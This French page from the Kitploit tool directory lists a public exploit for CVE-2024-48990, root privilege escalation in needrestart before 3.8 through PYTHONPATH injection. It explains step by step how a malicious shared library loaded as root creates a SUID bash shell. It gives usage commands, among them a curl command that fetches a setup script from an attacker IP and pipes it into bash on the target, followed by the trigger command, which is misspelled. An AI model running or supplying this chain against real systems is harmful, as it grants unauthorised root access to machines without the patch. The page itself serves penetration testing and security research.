Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-48990 — Exploit complet pour le shell root setuid de needsrestart | Kitploit
Outils/GitHubGitHub/mladicstefan/cve-2024-48990
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubmladicstefan/cve-2024-48990

CVE-2024-48990

Exploit complet pour le shell root setuid de needsrestart

Voir le dépôt
il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit CVE-2024-48990

Élévation de privilèges locale dans needrestart < 3.8 via l'injection PYTHONPATH.

Comment ça marche

  1. needrestart s'exécute en tant que root et analyse tous les processus
  2. Trouve notre processus Python, lit PYTHONPATH=/tmp/.m dans /proc/[pid]/environ
  3. Exécute Python en tant que root avec notre PYTHONPATH malveillant
  4. L'import de Python charge /tmp/.m/importlib/__init__.so (notre bibliothèque malveillante)
  5. Le constructeur dans .so s'exécute en tant que root avant même le démarrage de Python
  6. Crée un bash SUID dans /tmp/rootbash
  7. Exécutez /tmp/rootbash -p pour un shell root

Point clé : needrestart fait confiance aux variables d'environnement des processus non privilégiés et les utilise lors de l'exécution d'interpréteurs en tant que root.

Utilisation

Attaquant :

root@kitploit:~
./compile.sh
python3 -m http.server 8000

Cible :

root@kitploit:~
curl -sf http://10.10.14.109:8000/setup_exploit.sh | bash -s 10.10.14.109 8000
cd /tmp/.m && PYTHONPATH=/tmp/.m python3 e.py

Le processus e.py devrait se bloquer et générer un shell root une fois la commande suivante exécutée depuis un deuxième terminal :

root@kitploit:~
sudo needsrestard

le premier terminal démarrera un shell root

Crédits

Qualys Threat Research Unit - CVE-2024-48990

Télécharger l’outil